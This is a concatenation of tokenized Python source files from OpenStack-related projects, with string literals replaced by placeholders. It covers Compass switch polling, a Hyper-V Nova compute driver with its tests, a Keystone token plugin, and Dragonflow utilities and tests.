<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> current_dir = os . path . dirname ( os . path . realpath ( __file__ ) ) <EOL> sys . path . append ( current_dir ) <EOL> import switch_virtualenv <EOL> from compass . utils import flags <EOL> from compass . utils import logsetting <EOL> from compass . utils import setting_wrapper as setting <EOL> flags . init ( ) <EOL> flags . OPTIONS . logfile = setting . WEB_LOGFILE <EOL> logsetting . init ( ) <EOL> from compass . api import api as compass_api <EOL> compass_api . init ( ) <EOL> application = compass_api . app </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import netaddr <EOL> from compass . actions import util <EOL> from compass . db . api import database <EOL> from compass . db . api import switch as switch_api <EOL> from compass . db . api import user as user_api <EOL> from compass . hdsdiscovery . hdmanager import HDManager <EOL> def _poll_switch ( ip_addr , credentials , req_obj = '<STR_LIT>' , oper = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> under_monitoring = '<STR_LIT>' <EOL> unreachable = '<STR_LIT>' <EOL> polling_error = '<STR_LIT:error>' <EOL> hdmanager = HDManager ( ) <EOL> vendor , state , err_msg = hdmanager . get_vendor ( ip_addr , credentials ) <EOL> if not vendor : <EOL> logging . info ( "<STR_LIT>" , err_msg ) <EOL> logging . error ( '<STR_LIT>' , ip_addr ) <EOL> return ( <EOL> { <EOL> '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg <EOL> } , { <EOL> } <EOL> ) <EOL> logging . debug ( <EOL> '<STR_LIT>' , ip_addr <EOL> ) <EOL> results = [ ] <EOL> try : <EOL> results = hdmanager . learn ( <EOL> ip_addr , credentials , vendor , req_obj , oper <EOL> ) <EOL> except Exception as error : <EOL> logging . exception ( error ) <EOL> state = unreachable <EOL> err_msg = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> return ( <EOL> { <EOL> '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg <EOL> } , { <EOL> } <EOL> ) <EOL> logging . info ( "<STR_LIT>" , ip_addr , results ) <EOL> if not results : <EOL> logging . error ( <EOL> '<STR_LIT>' , ip_addr <EOL> ) <EOL> state = polling_error <EOL> err_msg = '<STR_LIT>' <EOL> return ( <EOL> { '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg } , <EOL> { } <EOL> ) <EOL> logging . 
info ( '<STR_LIT>' % str ( results ) ) <EOL> machine_dicts = { } <EOL> for machine in results : <EOL> mac = machine [ '<STR_LIT>' ] <EOL> port = machine [ '<STR_LIT:port>' ] <EOL> vlan = int ( machine [ '<STR_LIT>' ] ) <EOL> if vlan : <EOL> vlans = [ vlan ] <EOL> else : <EOL> vlans = [ ] <EOL> if mac not in machine_dicts : <EOL> machine_dicts [ mac ] = { '<STR_LIT>' : mac , '<STR_LIT:port>' : port , '<STR_LIT>' : vlans } <EOL> else : <EOL> machine_dicts [ mac ] [ '<STR_LIT:port>' ] = port <EOL> machine_dicts [ mac ] [ '<STR_LIT>' ] . extend ( vlans ) <EOL> logging . debug ( '<STR_LIT>' , ip_addr ) <EOL> state = under_monitoring <EOL> return ( <EOL> { '<STR_LIT>' : vendor , '<STR_LIT:state>' : state , '<STR_LIT>' : err_msg } , <EOL> machine_dicts . values ( ) <EOL> ) <EOL> def poll_switch ( poller_email , ip_addr , credentials , <EOL> req_obj = '<STR_LIT>' , oper = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> poller = user_api . get_user_object ( poller_email ) <EOL> ip_int = long ( netaddr . IPAddress ( ip_addr ) ) <EOL> with util . lock ( '<STR_LIT>' % ip_addr , timeout = <NUM_LIT> ) as lock : <EOL> if not lock : <EOL> raise Exception ( <EOL> '<STR_LIT>' % ip_addr <EOL> ) <EOL> logging . debug ( '<STR_LIT>' , ip_addr ) <EOL> switch_dict , machine_dicts = _poll_switch ( <EOL> ip_addr , credentials , req_obj = req_obj , oper = oper <EOL> ) <EOL> switches = switch_api . list_switches ( ip_int = ip_int , user = poller ) <EOL> if not switches : <EOL> logging . error ( '<STR_LIT>' , ip_addr ) <EOL> return <EOL> for switch in switches : <EOL> for machine_dict in machine_dicts : <EOL> logging . debug ( '<STR_LIT>' , machine_dict ) <EOL> switch_api . add_switch_machine ( <EOL> switch [ '<STR_LIT:id>' ] , False , user = poller , ** machine_dict <EOL> ) <EOL> switch_api . update_switch ( <EOL> switch [ '<STR_LIT:id>' ] , <EOL> user = poller , <EOL> ** switch_dict <EOL> ) </s>
<s> def validate_cluster_config ( ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from compass . hdsdiscovery import base <EOL> CLASS_NAME = '<STR_LIT>' <EOL> class Pica8 ( base . BaseSnmpVendor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> base . BaseSnmpVendor . __init__ ( self , [ '<STR_LIT>' ] ) <EOL> self . _name = '<STR_LIT>' <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _name </s>
<s> __author__ = "<STR_LIT>" <EOL> """<STR_LIT>""" <EOL> from mock import Mock <EOL> import os <EOL> import unittest2 <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:true>' <EOL> from compass . utils import setting_wrapper as setting <EOL> from copy import deepcopy <EOL> reload ( setting ) <EOL> from compass . deployment . deploy_manager import DeployManager <EOL> from compass . tests . deployment . test_data import config_data <EOL> from compass . utils import flags <EOL> from compass . utils import logsetting <EOL> class TestDeployManager ( unittest2 . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestDeployManager , self ) . setUp ( ) <EOL> def tearDown ( self ) : <EOL> super ( TestDeployManager , self ) . tearDown ( ) <EOL> def test_init_DeployManager ( self ) : <EOL> adapter_info = deepcopy ( config_data . adapter_test_config ) <EOL> cluster_info = deepcopy ( config_data . cluster_test_config ) <EOL> hosts_info = deepcopy ( config_data . hosts_test_config ) <EOL> DeployManager . _get_installer = Mock ( ) <EOL> DeployManager . _get_installer . return_value = "<STR_LIT>" <EOL> test_manager = DeployManager ( adapter_info , cluster_info , hosts_info ) <EOL> self . assertIsNotNone ( test_manager ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> flags . init ( ) <EOL> logsetting . init ( ) <EOL> unittest2 . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import platform <EOL> import sys <EOL> from nova import exception <EOL> from nova import image <EOL> from nova . virt import driver <EOL> from os_win import exceptions as os_win_exc <EOL> from os_win import utilsfactory <EOL> from oslo_log import log as logging <EOL> from oslo_utils import excutils <EOL> import six <EOL> from hyperv . i18n import _ , _LE <EOL> from hyperv . nova import eventhandler <EOL> from hyperv . nova import hostops <EOL> from hyperv . nova import imagecache <EOL> from hyperv . nova import livemigrationops <EOL> from hyperv . nova import migrationops <EOL> from hyperv . nova import rdpconsoleops <EOL> from hyperv . nova import serialconsoleops <EOL> from hyperv . nova import snapshotops <EOL> from hyperv . nova import vmops <EOL> from hyperv . nova import volumeops <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def convert_exceptions ( function , exception_map ) : <EOL> expected_exceptions = tuple ( exception_map . keys ( ) ) <EOL> @ functools . wraps ( function ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> try : <EOL> return function ( * args , ** kwargs ) <EOL> except expected_exceptions as ex : <EOL> raised_exception = exception_map . get ( type ( ex ) ) <EOL> if not raised_exception : <EOL> for expected in expected_exceptions : <EOL> if isinstance ( ex , expected ) : <EOL> raised_exception = exception_map [ expected ] <EOL> break <EOL> exc_info = sys . exc_info ( ) <EOL> exc = raised_exception ( six . text_type ( exc_info [ <NUM_LIT:1> ] ) ) <EOL> six . reraise ( raised_exception , exc , exc_info [ <NUM_LIT:2> ] ) <EOL> return wrapper <EOL> def decorate_all_methods ( decorator , * args , ** kwargs ) : <EOL> def decorate ( cls ) : <EOL> for attr in cls . 
__dict__ : <EOL> class_member = getattr ( cls , attr ) <EOL> if callable ( class_member ) : <EOL> setattr ( cls , attr , decorator ( class_member , * args , ** kwargs ) ) <EOL> return cls <EOL> return decorate <EOL> exception_conversion_map = { <EOL> os_win_exc . OSWinException : exception . NovaException , <EOL> os_win_exc . HyperVVMNotFoundException : exception . InstanceNotFound , <EOL> } <EOL> @ decorate_all_methods ( convert_exceptions , exception_conversion_map ) <EOL> class HyperVDriver ( driver . ComputeDriver ) : <EOL> capabilities = { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : True <EOL> } <EOL> def __init__ ( self , virtapi ) : <EOL> self . _check_minimum_windows_version ( ) <EOL> super ( HyperVDriver , self ) . __init__ ( virtapi ) <EOL> self . _hostops = hostops . HostOps ( ) <EOL> self . _volumeops = volumeops . VolumeOps ( ) <EOL> self . _vmops = vmops . VMOps ( virtapi ) <EOL> self . _snapshotops = snapshotops . SnapshotOps ( ) <EOL> self . _livemigrationops = livemigrationops . LiveMigrationOps ( ) <EOL> self . _migrationops = migrationops . MigrationOps ( ) <EOL> self . _rdpconsoleops = rdpconsoleops . RDPConsoleOps ( ) <EOL> self . _serialconsoleops = serialconsoleops . SerialConsoleOps ( ) <EOL> self . _imagecache = imagecache . ImageCache ( ) <EOL> self . _image_api = image . API ( ) <EOL> def _check_minimum_windows_version ( self ) : <EOL> if not utilsfactory . get_hostutils ( ) . check_min_windows_version ( <NUM_LIT:6> , <NUM_LIT:2> ) : <EOL> LOG . error ( _LE ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> raise exception . HypervisorTooOld ( version = '<STR_LIT>' ) <EOL> @ property <EOL> def need_legacy_block_device_info ( self ) : <EOL> return False <EOL> def init_host ( self , host ) : <EOL> self . _serialconsoleops . start_console_handlers ( ) <EOL> event_handler = eventhandler . InstanceEventHandler ( <EOL> state_change_callback = self . emit_event ) <EOL> event_handler . 
start_listener ( ) <EOL> def list_instance_uuids ( self ) : <EOL> return self . _vmops . list_instance_uuids ( ) <EOL> def list_instances ( self ) : <EOL> return self . _vmops . list_instances ( ) <EOL> def spawn ( self , context , instance , image_meta , injected_files , <EOL> admin_password , network_info = None , block_device_info = None ) : <EOL> image_meta = self . _recreate_image_meta ( context , instance , image_meta ) <EOL> self . _vmops . spawn ( context , instance , image_meta , injected_files , <EOL> admin_password , network_info , block_device_info ) <EOL> def reboot ( self , context , instance , network_info , reboot_type , <EOL> block_device_info = None , bad_volumes_callback = None ) : <EOL> self . _vmops . reboot ( instance , network_info , reboot_type ) <EOL> def destroy ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None ) : <EOL> self . _vmops . destroy ( instance , network_info , block_device_info , <EOL> destroy_disks ) <EOL> def cleanup ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None , destroy_vifs = True ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_info ( self , instance ) : <EOL> return self . _vmops . get_info ( instance ) <EOL> def attach_volume ( self , context , connection_info , instance , mountpoint , <EOL> disk_bus = None , device_type = None , encryption = None ) : <EOL> return self . _volumeops . attach_volume ( connection_info , <EOL> instance . name ) <EOL> def detach_volume ( self , connection_info , instance , mountpoint , <EOL> encryption = None ) : <EOL> return self . _volumeops . detach_volume ( connection_info , <EOL> instance . name ) <EOL> def get_volume_connector ( self , instance ) : <EOL> return self . _volumeops . get_volume_connector ( ) <EOL> def get_available_resource ( self , nodename ) : <EOL> return self . _hostops . 
get_available_resource ( ) <EOL> def get_available_nodes ( self , refresh = False ) : <EOL> return [ platform . node ( ) ] <EOL> def host_power_action ( self , action ) : <EOL> return self . _hostops . host_power_action ( action ) <EOL> def snapshot ( self , context , instance , image_id , update_task_state ) : <EOL> self . _snapshotops . snapshot ( context , instance , image_id , <EOL> update_task_state ) <EOL> def pause ( self , instance ) : <EOL> self . _vmops . pause ( instance ) <EOL> def unpause ( self , instance ) : <EOL> self . _vmops . unpause ( instance ) <EOL> def suspend ( self , context , instance ) : <EOL> self . _vmops . suspend ( instance ) <EOL> def resume ( self , context , instance , network_info , block_device_info = None ) : <EOL> self . _vmops . resume ( instance ) <EOL> def power_off ( self , instance , timeout = <NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> self . _vmops . power_off ( instance , timeout , retry_interval ) <EOL> def power_on ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> self . _vmops . power_on ( instance , block_device_info , network_info ) <EOL> def resume_state_on_host_boot ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> """<STR_LIT>""" <EOL> self . _vmops . resume_state_on_host_boot ( context , instance , network_info , <EOL> block_device_info ) <EOL> def live_migration ( self , context , instance , dest , post_method , <EOL> recover_method , block_migration = False , <EOL> migrate_data = None ) : <EOL> self . _livemigrationops . live_migration ( context , instance , dest , <EOL> post_method , recover_method , <EOL> block_migration , migrate_data ) <EOL> def rollback_live_migration_at_destination ( self , context , instance , <EOL> network_info , <EOL> block_device_info , <EOL> destroy_disks = True , <EOL> migrate_data = None ) : <EOL> self . 
destroy ( context , instance , network_info , block_device_info ) <EOL> def pre_live_migration ( self , context , instance , block_device_info , <EOL> network_info , disk_info , migrate_data = None ) : <EOL> self . _livemigrationops . pre_live_migration ( context , instance , <EOL> block_device_info , <EOL> network_info ) <EOL> def post_live_migration ( self , context , instance , block_device_info , <EOL> migrate_data = None ) : <EOL> self . _livemigrationops . post_live_migration ( context , instance , <EOL> block_device_info ) <EOL> def post_live_migration_at_source ( self , context , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> self . _vmops . unplug_vifs ( instance , network_info ) <EOL> def post_live_migration_at_destination ( self , context , instance , <EOL> network_info , <EOL> block_migration = False , <EOL> block_device_info = None ) : <EOL> self . _livemigrationops . post_live_migration_at_destination ( <EOL> context , <EOL> instance , <EOL> network_info , <EOL> block_migration ) <EOL> def check_can_live_migrate_destination ( self , context , instance , <EOL> src_compute_info , dst_compute_info , <EOL> block_migration = False , <EOL> disk_over_commit = False ) : <EOL> return self . _livemigrationops . check_can_live_migrate_destination ( <EOL> context , instance , src_compute_info , dst_compute_info , <EOL> block_migration , disk_over_commit ) <EOL> def check_can_live_migrate_destination_cleanup ( self , context , <EOL> dest_check_data ) : <EOL> self . _livemigrationops . check_can_live_migrate_destination_cleanup ( <EOL> context , dest_check_data ) <EOL> def check_can_live_migrate_source ( self , context , instance , <EOL> dest_check_data , block_device_info = None ) : <EOL> return self . _livemigrationops . 
check_can_live_migrate_source ( <EOL> context , instance , dest_check_data ) <EOL> def get_instance_disk_info ( self , instance , block_device_info = None ) : <EOL> pass <EOL> def plug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise NotImplementedError ( msg ) <EOL> def unplug_vifs ( self , instance , network_info ) : <EOL> """<STR_LIT>""" <EOL> msg = _ ( "<STR_LIT>" ) <EOL> raise NotImplementedError ( msg ) <EOL> def ensure_filtering_rules_for_instance ( self , instance , network_info ) : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> instance = instance ) <EOL> def unfilter_instance ( self , instance , network_info ) : <EOL> LOG . debug ( "<STR_LIT>" , instance = instance ) <EOL> def migrate_disk_and_power_off ( self , context , instance , dest , <EOL> flavor , network_info , <EOL> block_device_info = None , <EOL> timeout = <NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> return self . _migrationops . migrate_disk_and_power_off ( context , <EOL> instance , dest , <EOL> flavor , <EOL> network_info , <EOL> block_device_info , <EOL> timeout , <EOL> retry_interval ) <EOL> def confirm_migration ( self , migration , instance , network_info ) : <EOL> self . _migrationops . confirm_migration ( migration , instance , network_info ) <EOL> def finish_revert_migration ( self , context , instance , network_info , <EOL> block_device_info = None , power_on = True ) : <EOL> self . _migrationops . finish_revert_migration ( context , instance , <EOL> network_info , <EOL> block_device_info , power_on ) <EOL> def finish_migration ( self , context , migration , instance , disk_info , <EOL> network_info , image_meta , resize_instance , <EOL> block_device_info = None , power_on = True ) : <EOL> image_meta = self . _recreate_image_meta ( context , instance , image_meta ) <EOL> self . _migrationops . 
finish_migration ( context , migration , instance , <EOL> disk_info , network_info , <EOL> image_meta , resize_instance , <EOL> block_device_info , power_on ) <EOL> def get_host_ip_addr ( self ) : <EOL> return self . _hostops . get_host_ip_addr ( ) <EOL> def get_host_uptime ( self ) : <EOL> return self . _hostops . get_host_uptime ( ) <EOL> def get_rdp_console ( self , context , instance ) : <EOL> return self . _rdpconsoleops . get_rdp_console ( instance ) <EOL> def get_serial_console ( self , context , instance ) : <EOL> return self . _serialconsoleops . get_serial_console ( instance . name ) <EOL> def get_console_output ( self , context , instance ) : <EOL> return self . _serialconsoleops . get_console_output ( instance . name ) <EOL> def manage_image_cache ( self , context , all_instances ) : <EOL> self . _imagecache . update ( context , all_instances ) <EOL> def rescue ( self , context , instance , network_info , image_meta , <EOL> rescue_password ) : <EOL> image_meta = self . _recreate_image_meta ( context , instance , image_meta ) <EOL> try : <EOL> self . _vmops . rescue_instance ( context , instance , network_info , <EOL> image_meta , rescue_password ) <EOL> except Exception : <EOL> with excutils . save_and_reraise_exception ( ) : <EOL> self . _vmops . unrescue_instance ( instance ) <EOL> def unrescue ( self , instance , network_info ) : <EOL> self . _vmops . unrescue_instance ( instance ) <EOL> def attach_interface ( self , instance , image_meta , vif ) : <EOL> return self . _vmops . attach_interface ( instance , vif ) <EOL> def detach_interface ( self , instance , vif ) : <EOL> return self . _vmops . detach_interface ( instance , vif ) <EOL> def host_maintenance_mode ( self , host , mode ) : <EOL> return self . _hostops . host_maintenance_mode ( host , mode ) <EOL> def _recreate_image_meta ( self , context , instance , image_meta ) : <EOL> if image_meta . obj_attr_is_set ( "<STR_LIT:id>" ) : <EOL> image_ref = image_meta . 
id <EOL> else : <EOL> image_ref = instance . system_metadata [ '<STR_LIT>' ] <EOL> if image_ref : <EOL> image_meta = self . _image_api . get ( context , image_ref ) <EOL> else : <EOL> image_meta = image_meta . obj_to_primitive ( ) [ '<STR_LIT>' ] <EOL> image_meta [ '<STR_LIT>' ] = { k . replace ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) : v for k , v <EOL> in instance . system_metadata . items ( ) } <EOL> image_meta [ "<STR_LIT:id>" ] = image_ref <EOL> return image_meta </s>
<s> import os <EOL> import time <EOL> import mock <EOL> from nova import exception <EOL> from six . moves import builtins <EOL> from hyperv . nova import constants <EOL> from hyperv . nova import pathutils <EOL> from hyperv . tests . unit import test_base <EOL> class PathUtilsTestCase ( test_base . HyperVBaseTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( PathUtilsTestCase , self ) . setUp ( ) <EOL> self . fake_instance_dir = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . fake_instance_name = '<STR_LIT>' <EOL> self . _pathutils = pathutils . PathUtils ( ) <EOL> self . _pathutils . _smb_conn_attr = mock . MagicMock ( ) <EOL> def _mock_lookup_configdrive_path ( self , ext , rescue = False ) : <EOL> self . _pathutils . get_instance_dir = mock . MagicMock ( <EOL> return_value = self . fake_instance_dir ) <EOL> def mock_exists ( * args , ** kwargs ) : <EOL> path = args [ <NUM_LIT:0> ] <EOL> return True if path [ ( path . rfind ( '<STR_LIT:.>' ) + <NUM_LIT:1> ) : ] == ext else False <EOL> self . _pathutils . exists = mock_exists <EOL> configdrive_path = self . _pathutils . lookup_configdrive_path ( <EOL> self . fake_instance_name , rescue ) <EOL> return configdrive_path <EOL> def _test_lookup_configdrive_path ( self , rescue = False ) : <EOL> configdrive_name = '<STR_LIT>' <EOL> if rescue : <EOL> configdrive_name += '<STR_LIT>' <EOL> for format_ext in constants . DISK_FORMAT_MAP : <EOL> configdrive_path = self . _mock_lookup_configdrive_path ( format_ext , <EOL> rescue ) <EOL> expected_path = os . path . join ( self . fake_instance_dir , <EOL> configdrive_name + '<STR_LIT:.>' + format_ext ) <EOL> self . assertEqual ( expected_path , configdrive_path ) <EOL> def test_lookup_configdrive_path ( self ) : <EOL> self . _test_lookup_configdrive_path ( ) <EOL> def test_lookup_rescue_configdrive_path ( self ) : <EOL> self . 
_test_lookup_configdrive_path ( rescue = True ) <EOL> def test_lookup_configdrive_path_non_exist ( self ) : <EOL> self . _pathutils . get_instance_dir = mock . MagicMock ( <EOL> return_value = self . fake_instance_dir ) <EOL> self . _pathutils . exists = mock . MagicMock ( return_value = False ) <EOL> configdrive_path = self . _pathutils . lookup_configdrive_path ( <EOL> self . fake_instance_name ) <EOL> self . assertIsNone ( configdrive_path ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_get_instances_sub_dir ( self , fake_path_join ) : <EOL> class WindowsError ( Exception ) : <EOL> def __init__ ( self , winerror = None ) : <EOL> self . winerror = winerror <EOL> fake_dir_name = "<STR_LIT>" <EOL> fake_windows_error = WindowsError <EOL> self . _pathutils . check_create_dir = mock . MagicMock ( <EOL> side_effect = WindowsError ( pathutils . ERROR_INVALID_NAME ) ) <EOL> with mock . patch . object ( builtins , '<STR_LIT>' , <EOL> fake_windows_error , create = True ) : <EOL> self . assertRaises ( exception . AdminRequired , <EOL> self . _pathutils . _get_instances_sub_dir , <EOL> fake_dir_name ) <EOL> def test_copy_vm_console_logs ( self ) : <EOL> fake_local_logs = [ mock . sentinel . log_path , <EOL> mock . sentinel . archived_log_path ] <EOL> fake_remote_logs = [ mock . sentinel . remote_log_path , <EOL> mock . sentinel . remote_archived_log_path ] <EOL> self . _pathutils . exists = mock . Mock ( return_value = True ) <EOL> self . _pathutils . copy = mock . Mock ( ) <EOL> self . _pathutils . get_vm_console_log_paths = mock . Mock ( <EOL> side_effect = [ fake_local_logs , fake_remote_logs ] ) <EOL> self . _pathutils . copy_vm_console_logs ( mock . sentinel . instance_name , <EOL> mock . sentinel . dest_host ) <EOL> self . _pathutils . get_vm_console_log_paths . assert_has_calls ( <EOL> [ mock . call ( mock . sentinel . instance_name ) , <EOL> mock . call ( mock . sentinel . instance_name , <EOL> remote_server = mock . sentinel . dest_host ) ] ) <EOL> self . 
_pathutils . copy . assert_has_calls ( [ <EOL> mock . call ( mock . sentinel . log_path , <EOL> mock . sentinel . remote_log_path ) , <EOL> mock . call ( mock . sentinel . archived_log_path , <EOL> mock . sentinel . remote_archived_log_path ) ] ) <EOL> @ mock . patch . object ( pathutils . PathUtils , '<STR_LIT>' ) <EOL> @ mock . patch . object ( pathutils . PathUtils , '<STR_LIT>' ) <EOL> def _test_lookup_image_basepath ( self , mock_exists , <EOL> mock_get_base_vhd_dir , found = True ) : <EOL> fake_image_name = '<STR_LIT>' <EOL> if found : <EOL> mock_exists . side_effect = [ False , True ] <EOL> else : <EOL> mock_exists . return_value = False <EOL> mock_get_base_vhd_dir . return_value = '<STR_LIT>' <EOL> res = self . _pathutils . lookup_image_basepath ( fake_image_name ) <EOL> mock_get_base_vhd_dir . assert_called_once_with ( ) <EOL> if found : <EOL> self . assertEqual ( <EOL> res , os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> else : <EOL> self . assertIsNone ( res ) <EOL> def test_lookup_image_basepath ( self ) : <EOL> self . _test_lookup_image_basepath ( ) <EOL> def test_lookup_image_basepath_not_found ( self ) : <EOL> self . _test_lookup_image_basepath ( found = False ) <EOL> def test_get_age_of_file ( self ) : <EOL> current_time = time . time ( ) <EOL> self . _check_get_age_of_file ( current_time = current_time ) <EOL> @ mock . patch . object ( os . path , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def _check_get_age_of_file ( self , mock_time , mock_getmtime , current_time ) : <EOL> mock_time . return_value = current_time <EOL> mock_getmtime . return_value = current_time - <NUM_LIT:5> <EOL> ret = self . _pathutils . get_age_of_file ( mock . sentinel . file_name ) <EOL> self . assertEqual ( <NUM_LIT:5> , ret ) <EOL> mock_getmtime . assert_called_once_with ( mock . sentinel . file_name ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . 
patch ( '<STR_LIT>' ) <EOL> def test_check_dirs_shared_storage ( self , mock_named_tempfile , <EOL> mock_exists ) : <EOL> fake_src_dir = '<STR_LIT>' <EOL> fake_dest_dir = '<STR_LIT>' <EOL> mock_exists . return_value = True <EOL> mock_tmpfile = mock_named_tempfile . return_value . __enter__ . return_value <EOL> mock_tmpfile . name = '<STR_LIT>' <EOL> expected_src_tmp_path = os . path . join ( fake_src_dir , <EOL> mock_tmpfile . name ) <EOL> self . _pathutils . check_dirs_shared_storage ( <EOL> fake_src_dir , fake_dest_dir ) <EOL> mock_named_tempfile . assert_called_once_with ( dir = fake_dest_dir ) <EOL> mock_exists . assert_called_once_with ( expected_src_tmp_path ) </s>
<s> from keystoneauth1 . identity import v2 as v2_auth <EOL> from keystoneauth1 . identity import v3 as v3_auth <EOL> from openstack_auth . plugin import base <EOL> from openstack_auth import utils <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class TokenPlugin ( base . BasePlugin ) : <EOL> """<STR_LIT>""" <EOL> def get_plugin ( self , auth_url = None , token = None , project_id = None , <EOL> ** kwargs ) : <EOL> if not all ( ( auth_url , token ) ) : <EOL> return None <EOL> if utils . get_keystone_version ( ) >= <NUM_LIT:3> : <EOL> return v3_auth . Token ( auth_url = auth_url , <EOL> token = token , <EOL> project_id = project_id , <EOL> reauthenticate = False ) <EOL> else : <EOL> return v2_auth . Token ( auth_url = auth_url , <EOL> token = token , <EOL> tenant_id = project_id , <EOL> reauthenticate = False ) </s>
<s> from ryu . lib import addrconv <EOL> import struct <EOL> from dragonflow . controller . common import constants as const <EOL> UINT32_MAX = <NUM_LIT> <EOL> _aging_cookie = <NUM_LIT:0> <EOL> def ipv4_text_to_int ( ip_text ) : <EOL> if ip_text == <NUM_LIT:0> : <EOL> return ip_text <EOL> assert isinstance ( ip_text , str ) <EOL> return struct . unpack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( ip_text ) ) [ <NUM_LIT:0> ] <EOL> def mask_ntob ( mask , err_msg = None ) : <EOL> try : <EOL> return ( UINT32_MAX << ( <NUM_LIT:32> - mask ) ) & UINT32_MAX <EOL> except ValueError : <EOL> msg = '<STR_LIT>' <EOL> if err_msg is not None : <EOL> msg = '<STR_LIT>' % ( err_msg , msg ) <EOL> raise ValueError ( msg ) <EOL> def set_aging_cookie ( c ) : <EOL> global _aging_cookie <EOL> _aging_cookie = c <EOL> def get_aging_cookie ( ) : <EOL> return _aging_cookie <EOL> def set_aging_cookie_bits ( cookie ) : <EOL> c = cookie & ( ~ const . GLOBAL_AGING_COOKIE_MASK ) <EOL> c |= ( _aging_cookie & const . GLOBAL_AGING_COOKIE_MASK ) <EOL> return c <EOL> def get_xor_cookie ( cookie ) : <EOL> return cookie ^ const . GLOBAL_INIT_AGING_COOKIE </s>
<s> from dragonflow . db . drivers import ramcloud_db_driver <EOL> import getopt <EOL> import sys <EOL> def main ( argv ) : <EOL> db_ip = '<STR_LIT>' <EOL> db_port = '<STR_LIT>' <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , <EOL> '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except getopt . GetoptError : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for opt , arg in opts : <EOL> if opt == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . exit ( ) <EOL> elif opt in "<STR_LIT>" : <EOL> db_table = arg . split ( '<STR_LIT:U+002C>' ) <EOL> elif opt in "<STR_LIT>" : <EOL> db_ip = arg <EOL> elif opt in "<STR_LIT>" : <EOL> db_port = arg <EOL> print ( '<STR_LIT>' , db_table ) <EOL> print ( '<STR_LIT>' , db_ip ) <EOL> print ( '<STR_LIT>' , db_port ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' + db_ip + '<STR_LIT::>' + db_port ) <EOL> print ( '<STR_LIT>' , db_table ) <EOL> client = ramcloud_db_driver . RamCloudDbDriver ( ) <EOL> client . initialize ( db_ip , db_port ) <EOL> client . create_tables ( db_table ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import eventlet <EOL> import random <EOL> import six <EOL> from oslo_config import cfg <EOL> from oslo_serialization import jsonutils <EOL> from neutron . agent . linux . utils import wait_until_true <EOL> from dragonflow . common import utils as df_utils <EOL> from dragonflow . db . db_common import DbUpdate , SEND_ALL_TOPIC <EOL> from dragonflow . db . pub_sub_api import TableMonitor <EOL> from dragonflow . tests . common import utils as test_utils <EOL> from dragonflow . tests . fullstack import test_base <EOL> from dragonflow . tests . fullstack import test_objects as objects <EOL> events_num = <NUM_LIT:0> <EOL> def get_publisher ( ) : <EOL> pub_sub_driver = df_utils . load_driver ( <EOL> cfg . CONF . df . pub_sub_multiproc_driver , <EOL> df_utils . DF_PUBSUB_DRIVER_NAMESPACE ) <EOL> publisher = pub_sub_driver . get_publisher ( ) <EOL> publisher . initialize ( ) <EOL> return publisher <EOL> def get_subscriber ( callback ) : <EOL> pub_sub_driver = df_utils . load_driver ( <EOL> cfg . CONF . df . pub_sub_driver , <EOL> df_utils . DF_PUBSUB_DRIVER_NAMESPACE ) <EOL> subscriber = pub_sub_driver . get_subscriber ( ) <EOL> subscriber . initialize ( callback ) <EOL> uri = '<STR_LIT>' % ( <EOL> cfg . CONF . df . publisher_transport , <EOL> '<STR_LIT:127.0.0.1>' , <EOL> cfg . CONF . df . publisher_port <EOL> ) 